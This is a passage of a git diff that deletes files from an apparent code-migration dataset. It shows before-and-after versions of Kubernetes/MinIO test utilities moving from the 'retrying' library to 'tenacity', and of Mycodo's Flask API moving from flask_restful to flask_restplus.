'{uri.scheme}://{uri.netloc}/'.format(uri=parsed_url) - - resp = requests.get(auth_dex_url, verify=False) - soup = BeautifulSoup(resp.text, 'html.parser') - login_form_action = urljoin(dex_base_url, soup.form['action']) - - data = JANE - resp = requests.post(login_form_action, data=data, allow_redirects=False, verify=False) - - resp = requests.get(urljoin(dex_base_url, resp.headers['Location']), allow_redirects=False, - verify=False) - query = 
urlparse(resp.headers['Location']).query - auth_code = parse_qs(query)['code'][0] - - return auth_code - - -@pytest.fixture(scope="function") -def function_context(request, get_k8s_custom_obj_client, api_instance, minio_resource, - minio_client): - context = Context(k8s_client=api_instance, k8s_client_custom=get_k8s_custom_obj_client, - minio_resource_client=minio_resource, minio_client=minio_client) - request.addfinalizer(context.delete_all_objects) - return context - - -@pytest.fixture(scope="session") -def minio_client(): - return boto3.client('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="session") -def minio_resource(): - return boto3.resource('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="function") -def tenant_with_endpoint(function_context, tenant, get_k8s_custom_obj_client): - namespace, _ = tenant - metadata = {"name": "predict"} - resources = transform_quota(ENDPOINT_RESOURCES) - model_name, model_version = 'resnet', 1 - spec = { - 'modelName': model_name, - 'modelVersion': model_version, - 'endpointName': 'predict', - 'subjectName': 'client', - 'replicas': 1, - 'resources': resources - } - body = {"spec": spec, 'kind': CRD_KIND, "replicas": 1, - "apiVersion": CRD_API_VERSION, "metadata": metadata} - get_k8s_custom_obj_client. \ - create_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, body) - object_to_delete = {'name': "predict", 'namespace': namespace} - function_context.add_object(object_type='CRD', object_to_delete=object_to_delete) - return namespace, body - - -@retry(stop=stop_after_attempt(3), wait=wait_fixed(0.2)) -def get_all_pods_in_namespace(k8s_client, namespace, label_selector=''): - try: - api_response = k8s_client.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as e: - print("Exception when calling CoreV1Api->list_pod_for_all_namespaces: %s\n" % e) - - return api_response - - -def resource_quota(api_instance, quota={}, namespace=TENANT_NAME): - name_object = client.V1ObjectMeta(name=namespace) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance.create_namespaced_resource_quota(namespace=namespace, body=body) - return quota - - -@pytest.fixture(scope="function") -def tenant(api_instance, minio_client, function_context): - name = TENANT_NAME - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance.create_namespace(namespace) - propagate_portable_secrets(api_instance, name) - quota = resource_quota(api_instance, quota=TENANT_RESOURCES) - minio_client.create_bucket(Bucket=name) - function_context.add_object(object_type='tenant', object_to_delete={'name': name}) - return name, quota - - -@pytest.fixture(scope="session") -def fake_tenant(): - name = "andrzej" # USER1_HEADERS contain token for andrzej user with scope andrzej - quota = {} - return name, quota - - -@pytest.fixture(scope="function") -def empty_tenant(tenant): - return create_dummy_tenant(tenant) - - -@pytest.fixture(scope="function") -def fake_tenant_endpoint(fake_tenant): - return 
create_dummy_tenant(fake_tenant) - - -def create_dummy_tenant(tenant): - name, _ = tenant - body = {} - return name, body - - -@pytest.fixture(scope="function") -def fake_endpoint(tenant): - namespace, _ = tenant - model_name, model_version = 'fake', 1 - body = {'spec': {'modelName': model_name, - 'modelVersion': model_version}} - return namespace, body - - -def create_empty_model(endpoint, minio_client): - namespace, body = endpoint - model_name, model_version = body['spec']['modelName'], body['spec']['modelVersion'] - model_path = f'{model_name}-{model_version}/' - minio_client.put_object(Bucket=namespace, Body='', Key=model_path) - return namespace, body - - -@pytest.fixture(scope="function") -def endpoint_with_empty_model(tenant_with_endpoint, minio_client): - return create_empty_model(tenant_with_endpoint, minio_client) - - -@pytest.fixture(scope="function") -def fake_endpoint_with_empty_model(fake_endpoint, minio_client): - return create_empty_model(fake_endpoint, minio_client) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff deleted file mode 100644 index 7fe9d95..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff +++ /dev/null @@ -1,37 +0,0 @@ -diff --git a/tests/management_api_tests/context.py b/tests/management_api_tests/context.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/tests/management_api_tests/context.py - +++ b/tests/management_api_tests/context.py -@@ -1,4 +1,4 @@ --from retrying import retry -+from tenacity import retry, stop_after_attempt, wait_fixed - import logging - from kubernetes import client - -@@ -67,7 +67,7 @@ class Context(object): - logging.info('Tenant {} deletion timeout.'.format(object_to_delete['name'])) - return OperationStatus.SUCCESS - -- @retry(stop_max_attempt_number=3, wait_fixed=2000) -+ @retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) - def _delete_crd_server(self, object_to_delete): - delete_body = client.V1DeleteOptions() - try: -@@ -87,7 +87,7 @@ class Context(object): - logging.info('CRD {} deletion timeout.'.format(object_to_delete['name'])) - return response - -- @retry(stop_max_attempt_number=100, wait_fixed=2000) -+ @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_server_deletion(self, object_to_delete): - server_status = check_server_existence( - self.k8s_client_custom, object_to_delete['namespace'], object_to_delete['name']) -@@ -104,7 +104,7 @@ class Context(object): - return OperationStatus.SUCCESS - raise Exception - -- @retry(stop_max_attempt_number=100, wait_fixed=2000) -+ @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_tenant_deletion(self, name): - bucket_status = check_bucket_existence(self.minio_client, name) - namespace_status = check_namespace_availability(self.k8s_client_api, name) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py deleted file mode 100644 index 363d649..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py +++ /dev/null @@ -1,120 +0,0 @@ -from retrying import retry -import logging -from kubernetes import client - -from 
management_api_tests.config import CRD_GROUP, CRD_VERSION, CRD_PLURAL, OperationStatus, \ - CheckResult -from management_api_tests.endpoints.endpoint_utils import check_server_existence, \ - check_server_pods_existence -from management_api_tests.tenants.tenant_utils import check_bucket_existence, \ - check_namespace_availability - - -class Context(object): - - def __init__(self, k8s_client, k8s_client_custom, minio_resource_client, minio_client): - self._objects = [] - self.k8s_client_api = k8s_client - self.k8s_client_custom = k8s_client_custom - self.minio_resource_client = minio_resource_client - self.minio_client = minio_client - - self.DELETE_FUNCTIONS = {'tenant': self._delete_namespace_bucket, - 'CRD': self._delete_crd_server} - - def delete_all_objects(self): - while len(self._objects) > 0: - item = self._objects.pop() - try: - logging.info("cleaning: {}".format(item['object'])) - item['function'](object_to_delete=item['object']) - except Exception as e: - logging.warning("Error while deleting {}: {}".format(item, e)) - - def add_object(self, object_type: str, object_to_delete: dict): - if object_type in self.DELETE_FUNCTIONS: - ready_object = {'function': self.DELETE_FUNCTIONS[object_type], - 'object': object_to_delete} - logging.info("adding: {}".format(object_to_delete)) - self._objects.append(ready_object) - else: - logging.info("We cannot match any delete function to this object: " - "{}".format(object_to_delete)) - - def _delete_namespace_bucket(self, object_to_delete): - name = object_to_delete['name'] - try: - bucket = self.minio_resource_client.Bucket(name) - bucket.objects.all().delete() - bucket.delete() - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - body = client.V1DeleteOptions() - try: - self.k8s_client_api.delete_namespace(name, body) - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - deletion_status = self._wait_tenant_deletion(object_to_delete['name']) - if deletion_status == OperationStatus.SUCCESS: - logging.info('Tenant {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('Tenant {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('Tenant {} deletion timeout.'.format(object_to_delete['name'])) - return OperationStatus.SUCCESS - - @retry(stop_max_attempt_number=3, wait_fixed=2000) - def _delete_crd_server(self, object_to_delete): - delete_body = client.V1DeleteOptions() - try: - response = self.k8s_client_custom.delete_namespaced_custom_object( - CRD_GROUP, CRD_VERSION, object_to_delete['namespace'], CRD_PLURAL, - object_to_delete['name'], delete_body, grace_period_seconds=0) - except Exception as e: - logging.error(e) - raise - - deletion_status = self._wait_server_deletion(object_to_delete) - if deletion_status == OperationStatus.SUCCESS: - logging.info('CRD {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('CRD {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('CRD {} deletion timeout.'.format(object_to_delete['name'])) - return response - - @retry(stop_max_attempt_number=100, wait_fixed=2000) - def _wait_server_deletion(self, object_to_delete): - server_status = check_server_existence( - self.k8s_client_custom, object_to_delete['namespace'], object_to_delete['name']) - server_pods_status = check_server_pods_existence( - self.k8s_client_api, object_to_delete['namespace'], 
object_to_delete['name'], 1) - completed = (server_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - server_pods_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if server_status == CheckResult.ERROR or server_pods_status == CheckResult.ERROR: - logging.error("Error occurred during server status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception - - @retry(stop_max_attempt_number=100, wait_fixed=2000) - def _wait_tenant_deletion(self, name): - bucket_status = check_bucket_existence(self.minio_client, name) - namespace_status = check_namespace_availability(self.k8s_client_api, name) - completed = (bucket_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - namespace_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if bucket_status == CheckResult.ERROR or namespace_status == CheckResult.ERROR: - logging.error("Error occurred during bucket or namespace status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py deleted file mode 100644 index 5906e60..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py +++ /dev/null @@ -1,120 +0,0 @@ -from tenacity import retry, stop_after_attempt, wait_fixed -import logging -from kubernetes import client - -from management_api_tests.config import CRD_GROUP, CRD_VERSION, CRD_PLURAL, OperationStatus, \ - CheckResult -from management_api_tests.endpoints.endpoint_utils import check_server_existence, \ - check_server_pods_existence -from management_api_tests.tenants.tenant_utils import check_bucket_existence, \ - check_namespace_availability - - -class Context(object): - - def __init__(self, k8s_client, k8s_client_custom, minio_resource_client, minio_client): - self._objects = [] - self.k8s_client_api = k8s_client - self.k8s_client_custom = k8s_client_custom - self.minio_resource_client = minio_resource_client - self.minio_client = minio_client - - self.DELETE_FUNCTIONS = {'tenant': self._delete_namespace_bucket, - 'CRD': self._delete_crd_server} - - def delete_all_objects(self): - while len(self._objects) > 0: - item = self._objects.pop() - try: - logging.info("cleaning: {}".format(item['object'])) - item['function'](object_to_delete=item['object']) - except Exception as e: - logging.warning("Error while deleting {}: {}".format(item, e)) - - def add_object(self, object_type: str, object_to_delete: dict): - if object_type in self.DELETE_FUNCTIONS: - ready_object = {'function': self.DELETE_FUNCTIONS[object_type], - 'object': object_to_delete} - logging.info("adding: {}".format(object_to_delete)) - self._objects.append(ready_object) - else: - logging.info("We cannot match any delete function to this object: " - "{}".format(object_to_delete)) - - def _delete_namespace_bucket(self, object_to_delete): - name = object_to_delete['name'] - try: - bucket = self.minio_resource_client.Bucket(name) - bucket.objects.all().delete() - bucket.delete() - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - body = client.V1DeleteOptions() - try: - self.k8s_client_api.delete_namespace(name, body) - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - deletion_status = 
self._wait_tenant_deletion(object_to_delete['name']) - if deletion_status == OperationStatus.SUCCESS: - logging.info('Tenant {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('Tenant {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('Tenant {} deletion timeout.'.format(object_to_delete['name'])) - return OperationStatus.SUCCESS - - @retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) - def _delete_crd_server(self, object_to_delete): - delete_body = client.V1DeleteOptions() - try: - response = self.k8s_client_custom.delete_namespaced_custom_object( - CRD_GROUP, CRD_VERSION, object_to_delete['namespace'], CRD_PLURAL, - object_to_delete['name'], delete_body, grace_period_seconds=0) - except Exception as e: - logging.error(e) - raise - - deletion_status = self._wait_server_deletion(object_to_delete) - if deletion_status == OperationStatus.SUCCESS: - logging.info('CRD {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('CRD {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('CRD {} deletion timeout.'.format(object_to_delete['name'])) - return response - - @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_server_deletion(self, object_to_delete): - server_status = check_server_existence( - self.k8s_client_custom, object_to_delete['namespace'], object_to_delete['name']) - server_pods_status = check_server_pods_existence( - self.k8s_client_api, object_to_delete['namespace'], object_to_delete['name'], 1) - completed = (server_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - server_pods_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if server_status == CheckResult.ERROR or server_pods_status == CheckResult.ERROR: - logging.error("Error occurred during server status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception - - @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_tenant_deletion(self, name): - bucket_status = check_bucket_existence(self.minio_client, name) - namespace_status = check_namespace_availability(self.k8s_client_api, name) - completed = (bucket_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - namespace_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if bucket_status == CheckResult.ERROR or namespace_status == CheckResult.ERROR: - logging.error("Error occurred during bucket or namespace status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff deleted file mode 100644 index 3f4e6cc..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/tests/management_api_tests/endpoints/endpoint_utils.py b/tests/management_api_tests/endpoints/endpoint_utils.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/tests/management_api_tests/endpoints/endpoint_utils.py - +++ b/tests/management_api_tests/endpoints/endpoint_utils.py -@@ -1,6 +1,6 @@ - from time import sleep - --from retrying import retry 
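# Both _wait_* helpers above poll by raising a bare Exception until the
# resource is gone, so stop_after_attempt(100) with wait_fixed(2) bounds the
# wait at roughly 100 x 2 s. One behavioural difference worth noting: once
# attempts are exhausted, retrying re-raises the last exception by default,
# while tenacity raises tenacity.RetryError wrapping it. A self-contained
# sketch of the same polling idiom; check_gone stands in for the
# check_*_existence helpers and is not part of the dataset:

import itertools
from tenacity import retry, stop_after_attempt, wait_fixed

_polls = itertools.count(1)

def check_gone():
    return next(_polls) >= 3  # pretend deletion completes on the third poll

@retry(stop=stop_after_attempt(100), wait=wait_fixed(2))
def wait_until_deleted():
    if not check_gone():
        raise Exception  # any exception schedules the next attempt
    return "SUCCESS"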
-+from tenacity import retry, stop_after_attempt - - from management_api_tests.config import CRD_GROUP, CRD_PLURAL, CRD_VERSION, CheckResult, \ - RESOURCE_NOT_FOUND, OperationStatus -@@ -105,7 +105,7 @@ def check_server_update_result(api_instance, namespace, endpoint_name, new_value - return CheckResult.CONTENTS_MATCHING - - --@retry(stop_max_attempt_number=50) -+@retry(stop=stop_after_attempt(50)) - def wait_server_setup(api_instance, namespace, endpoint_name, replicas): - sleep(2) - try: diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py deleted file mode 100644 index 2eed92f..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py +++ /dev/null @@ -1,122 +0,0 @@ -from time import sleep - -from retrying import retry - -from management_api_tests.config import CRD_GROUP, CRD_PLURAL, CRD_VERSION, CheckResult, \ - RESOURCE_NOT_FOUND, OperationStatus -from kubernetes.client.rest import ApiException -import logging - -from management_api_tests.reused import transform_quota - - -def check_replicas_number_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_number): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if endpoint_object['spec']['replicas'] == provided_number: - return CheckResult.CONTENTS_MATCHING - return CheckResult.CONTENTS_MISMATCHING - - -def check_model_params_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_params): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if 'resources' in provided_params: - provided_params['resources'] = transform_quota(provided_params['resources']) - - for k, v in provided_params.items(): - if k not in endpoint_object['spec'] or provided_params[k] != endpoint_object['spec'][k]: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -def check_server_existence(custom_obj_api_instance, namespace, endpoint_name): - try: - custom_obj_api_instance. 
\ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, - CRD_PLURAL, endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_pods_existence(api_instance, namespace, endpoint_name, replicas): - label_selector = 'endpoint={}'.format(endpoint_name) - try: - pods = api_instance.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - if len(pods.items) != replicas: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_update_result(api_instance, namespace, endpoint_name, new_values): - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return CheckResult.ERROR - - container = api_response.spec.template.spec.containers.pop() - arg = container.args.pop() - quota = container.resources.limits - quota.update(container.resources.requests) - model_path = f'{namespace}/{new_values["modelName"]}-{new_values["modelVersion"]}' - if 'resources' in new_values: - new_values['resources'] = transform_quota(new_values['resources']) - for key, value in new_values['resources']: - if new_values[key] != quota[key]: - return CheckResult.CONTENTS_MISMATCHING - if ('--model_name=' + new_values['modelName']) not in arg or ( - '--model_base_path=s3://' + model_path) not in arg: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -@retry(stop_max_attempt_number=50) -def wait_server_setup(api_instance, namespace, endpoint_name, replicas): - sleep(2) - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return OperationStatus.TERMINATED - - if api_response.status.updated_replicas != replicas: - return OperationStatus.FAILURE - if api_response.status.ready_replicas != api_response.status.updated_replicas: - raise Exception - return OperationStatus.SUCCESS diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py deleted file mode 100644 index 324b30c..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py +++ /dev/null @@ -1,122 +0,0 @@ -from time import sleep - -from tenacity import retry, stop_after_attempt - -from management_api_tests.config import CRD_GROUP, CRD_PLURAL, CRD_VERSION, CheckResult, \ - RESOURCE_NOT_FOUND, OperationStatus -from kubernetes.client.rest import ApiException -import logging - -from management_api_tests.reused import transform_quota - - -def check_replicas_number_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_number): - try: - endpoint_object = custom_obj_api_instance. 
\ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if endpoint_object['spec']['replicas'] == provided_number: - return CheckResult.CONTENTS_MATCHING - return CheckResult.CONTENTS_MISMATCHING - - -def check_model_params_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_params): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if 'resources' in provided_params: - provided_params['resources'] = transform_quota(provided_params['resources']) - - for k, v in provided_params.items(): - if k not in endpoint_object['spec'] or provided_params[k] != endpoint_object['spec'][k]: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -def check_server_existence(custom_obj_api_instance, namespace, endpoint_name): - try: - custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, - CRD_PLURAL, endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_pods_existence(api_instance, namespace, endpoint_name, replicas): - label_selector = 'endpoint={}'.format(endpoint_name) - try: - pods = api_instance.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - if len(pods.items) != replicas: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_update_result(api_instance, namespace, endpoint_name, new_values): - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return CheckResult.ERROR - - container = api_response.spec.template.spec.containers.pop() - arg = container.args.pop() - quota = container.resources.limits - quota.update(container.resources.requests) - model_path = f'{namespace}/{new_values["modelName"]}-{new_values["modelVersion"]}' - if 'resources' in new_values: - new_values['resources'] = transform_quota(new_values['resources']) - for key, value in new_values['resources']: - if new_values[key] != quota[key]: - return CheckResult.CONTENTS_MISMATCHING - if ('--model_name=' + new_values['modelName']) not in arg or ( - '--model_base_path=s3://' + model_path) not in arg: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -@retry(stop=stop_after_attempt(50)) -def wait_server_setup(api_instance, namespace, endpoint_name, replicas): - sleep(2) - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, 
- namespace, - pretty="pretty") - except ApiException as apiException: - return OperationStatus.TERMINATED - - if api_response.status.updated_replicas != replicas: - return OperationStatus.FAILURE - if api_response.status.ready_replicas != api_response.status.updated_replicas: - raise Exception - return OperationStatus.SUCCESS diff --git a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff b/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff deleted file mode 100644 index 9bcb4d6..0000000 --- a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff +++ /dev/null @@ -1,60 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api.py b/mycodo/mycodo_flask/api.py - index f16c7239c2ced3605d1506d0236729fc23c9df10..047263beb9e4301c30eef0f44d8d93c722b31f20 100644 - --- a/mycodo/mycodo_flask/api.py - +++ b/mycodo/mycodo_flask/api.py -@@ -2,7 +2,9 @@ - import logging - - import flask_login --from flask_restful import Resource -+from flask import Blueprint -+from flask_restplus import Api -+from flask_restplus import Resource - - from mycodo.databases.models import Input - from mycodo.databases.models import User -@@ -12,28 +14,33 @@ from mycodo.mycodo_flask.utils import utils_general - - logger = logging.getLogger(__name__) - -+api_bp = Blueprint('api', __name__, url_prefix='/api') - --class Inputs(Resource): -+api = Api(api_bp, version='1.0', title='Mycodo API', -+ description='An API for Mycodo') -+ -+ -+@api.route('/inputs') -+class Users(Resource): -+ """Interacts with Input settings in the SQL database""" -+ @api.doc('dump_users') - @flask_login.login_required - def get(self): -+ """Dumps all Input settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 -- inputs_list = [] - input_schema = InputSchema() -- all_inputs = Input.query.all() -- for each_input in all_inputs: -- inputs_list.append(input_schema.dump(each_input)) -- return inputs_list -+ return input_schema.dump(Input.query.all(), many=True) - - -+@api.route('/users') - class Users(Resource): -+ """Interacts with User settings in the SQL database""" -+ @api.doc('dump_users') - @flask_login.login_required - def get(self): -+ """Dumps all User settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 -- users_list = [] - user_schema = UserSchema() -- all_users = User.query.all() -- for each_user in all_users: -- users_list.append(user_schema.dump(each_user)) -- return users_list -+ return user_schema.dump(User.query.all(), many=True) diff --git a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py b/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py deleted file mode 100644 index 9995643..0000000 --- a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py +++ /dev/null @@ -1,39 +0,0 @@ -# coding=utf-8 -import logging - -import flask_login -from flask_restful import Resource - -from mycodo.databases.models import Input -from mycodo.databases.models import User -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - - -class Inputs(Resource): - @flask_login.login_required - def get(self): - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - 
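# wait_server_setup above takes the other tenacity shape: only a stop
# strategy is given (no wait=, so failed attempts re-run immediately) and
# the pacing stays as the sleep(2) at the top of the body. A sketch of that
# shape; probe is an illustrative stand-in for the deployment-status check:

from time import sleep
from tenacity import retry, stop_after_attempt

@retry(stop=stop_after_attempt(50))
def wait_ready(probe=lambda: True):
    sleep(2)              # pacing lives in the body, not in the decorator
    if not probe():
        raise Exception   # raising consumes one of the 50 attempts
    return "SUCCESS"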
inputs_list = [] - input_schema = InputSchema() - all_inputs = Input.query.all() - for each_input in all_inputs: - inputs_list.append(input_schema.dump(each_input)) - return inputs_list - - -class Users(Resource): - @flask_login.login_required - def get(self): - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - users_list = [] - user_schema = UserSchema() - all_users = User.query.all() - for each_user in all_users: - users_list.append(user_schema.dump(each_user)) - return users_list diff --git a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py b/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py deleted file mode 100644 index b5ffeb6..0000000 --- a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py +++ /dev/null @@ -1,46 +0,0 @@ -# coding=utf-8 -import logging - -import flask_login -from flask import Blueprint -from flask_restplus import Api -from flask_restplus import Resource - -from mycodo.databases.models import Input -from mycodo.databases.models import User -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -api_bp = Blueprint('api', __name__, url_prefix='/api') - -api = Api(api_bp, version='1.0', title='Mycodo API', - description='An API for Mycodo') - - -@api.route('/inputs') -class Users(Resource): - """Interacts with Input settings in the SQL database""" - @api.doc('dump_users') - @flask_login.login_required - def get(self): - """Dumps all Input settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - input_schema = InputSchema() - return 